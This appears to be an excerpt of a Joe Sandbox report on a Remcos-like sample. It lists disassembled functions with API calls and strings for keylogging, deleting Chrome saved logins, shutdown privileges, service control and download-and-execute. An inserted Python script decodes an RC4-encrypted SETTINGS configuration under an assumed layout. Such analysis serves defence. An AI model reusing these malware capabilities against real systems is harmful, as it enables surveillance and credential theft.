                                                                                                                                                                                                                                            • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bd09a2d99c30552ee9248d9d3ead224cb3624160a648d3944adbeb409a266ec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                                                                                                                                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                                                                            • String ID: Keylogger initialization failure: error
                                                                                                                                                                                                                                            • API String ID: 3219506041-952744263
                                                                                                                                                                                                                                            • Opcode ID: 5af43bf104337a9e081dc86c94caad902621d20e35d05cd08c7acc153c36ae5a
                                                                                                                                                                                                                                            • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5af43bf104337a9e081dc86c94caad902621d20e35d05cd08c7acc153c36ae5a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                                                                            • API String ID: 2127411465-314212984
                                                                                                                                                                                                                                            • Opcode ID: 01ca47e6259c52365a860d80c50150ca5f809e30565b780a3dfea60843a9f005
                                                                                                                                                                                                                                            • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01ca47e6259c52365a860d80c50150ca5f809e30565b780a3dfea60843a9f005
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                                                                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                                                                                                                            • API String ID: 2281282204-3981147832
                                                                                                                                                                                                                                            • Opcode ID: 15389f4d20d818ee95bf8d757abcbf9e71d2a033ca16b4e774801a1882311dd6
                                                                                                                                                                                                                                            • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15389f4d20d818ee95bf8d757abcbf9e71d2a033ca16b4e774801a1882311dd6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                                                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                                                                                                                            • UserProfile, xrefs: 0040B227
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                                                                            • API String ID: 2018770650-1062637481
                                                                                                                                                                                                                                            • Opcode ID: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                                                                                                                                                                                                            • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 3534403312-3733053543
                                                                                                                                                                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                                                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                                                                                                                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                                                                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                                                                                                                                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                                                                                                                                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4043647387-0
                                                                                                                                                                                                                                            • Opcode ID: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                                                                                                                                                                                                            • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                                                                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 276877138-0
                                                                                                                                                                                                                                            • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                                                                                                                                                            • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                                                                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                                                                            • String ID: @CG$XCG$>G
                                                                                                                                                                                                                                            • API String ID: 341183262-3030817687
                                                                                                                                                                                                                                            • Opcode ID: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                                                                                                                                                                                                            • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
Similarity
• API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
• String ID: PowrProf.dll$SetSuspendState
• API String ID: 1589313981-1420736420
• Opcode ID: 8e4698fe78d44acac16c4ddae03765096e4e2cb4d027e838fe1b9563e95c49cf
• Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
• Opcode Fuzzy Hash: 8e4698fe78d44acac16c4ddae03765096e4e2cb4d027e838fe1b9563e95c49cf
• Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045128C
• GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512B5
• GetACP.KERNEL32 ref: 004512CA
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
• Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
• Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
• Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
• LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
• LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
• SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
• Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
• Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
• Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
• Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
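The function above fetches a resource of type 0000000A (RT_RCDATA) named SETTINGS through FindResourceA, LoadResource, LockResource and SizeofResource. That resource is where Remcos stores its configuration, which is what the report's "Found malware configuration" and "C2 URLs / IPs found in malware configuration" signatures refer to. The script below is an added example, not code from this report or from the sample. It assumes the publicly documented Remcos SETTINGS layout (one byte of key length, the RC4 key, then the RC4-encrypted configuration, whose fields are separated by the byte string `|\x1e\x1e\x1f|`); nothing on this page states that layout. The blob it decodes is constructed inline with made-up field values (a documentation-range IP, a placeholder mutex name) so that it runs offline; on a real sample you would feed it the bytes of the SETTINGS resource instead.

```python
"""Decode a Remcos-style SETTINGS blob (added example, not from the report).

Assumed layout (from public Remcos analyses, not stated on this page):
  blob = key_len (1 byte) | rc4_key (key_len bytes) | RC4(rc4_key, config)
  config = field_0 | FIELD_SEP | field_1 | FIELD_SEP | ...
"""
from typing import List

FIELD_SEP = b"|\x1e\x1e\x1f|"  # assumed field separator inside the decrypted config

# Constructed sample configuration; values are made up for the example.
SAMPLE_KEY = b"k3y-not-real"
SAMPLE_FIELDS = [b"198.51.100.10:2404:1", b"RemoteHost", b"Rmc-EXAMPLE"]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). RC4 is symmetric: the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_settings_blob(key: bytes, fields: List[bytes]) -> bytes:
    """Produce a blob in the assumed layout; used only to construct test input."""
    if not 0 < len(key) < 256:
        raise ValueError("key length must fit in one byte and be non-zero")
    return bytes([len(key)]) + key + rc4(key, FIELD_SEP.join(fields))


def decode_settings_blob(blob: bytes) -> List[bytes]:
    """Recover the RC4 key from the length prefix and return the decrypted field list.

    A blob that cannot hold the announced key raises ValueError instead of yielding
    garbage, so a caller scanning many RCDATA resources can tell "not this format"
    from "decoded".
    """
    if len(blob) < 2:
        raise ValueError("blob too short for a key-length prefix")
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len:
        raise ValueError("key length %d does not fit in a %d-byte blob" % (key_len, len(blob)))
    key = blob[1:1 + key_len]
    return rc4(key, blob[1 + key_len:]).split(FIELD_SEP)


if __name__ == "__main__":
    blob = build_settings_blob(SAMPLE_KEY, SAMPLE_FIELDS)
    for index, field in enumerate(decode_settings_blob(blob)):
        print(index, field.decode("latin-1"))
```

To use it against a real dump, extract the SETTINGS RCDATA resource (for example with a PE parser or Resource Hacker) and pass its raw bytes to `decode_settings_blob`; the first decoded field is where the C2 host list is expected under the assumed layout, but verify that against the report's own configuration section rather than trusting the field order blindly.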
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
• GetUserDefaultLCID.KERNEL32 ref: 004514D3
• IsValidCodePage.KERNEL32(00000000), ref: 0045152E
• IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
• GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451585
• GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004515A4
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID:
• API String ID: 745075371-0
• Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
• Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
• Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
• Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
APIs
• __EH_prolog.LIBCMT ref: 00407A91
• FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
• Opcode ID: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
• Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
• Opcode Fuzzy Hash: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
• Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Users\user\Desktop\iGhDjzEiDU.exe$open
• API String ID: 2825088817-1303315117
• Opcode ID: ff8c430fb8ca32cad0500a1d36d7f1307f3dbf8e19fa7769455aa58a39e32366
• Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
• Opcode Fuzzy Hash: ff8c430fb8ca32cad0500a1d36d7f1307f3dbf8e19fa7769455aa58a39e32366
• Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstNextsend
• String ID: x@G$x@G
• API String ID: 4113138495-3390264752
• Opcode ID: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
• Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
• Opcode Fuzzy Hash: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
• Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
APIs
                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
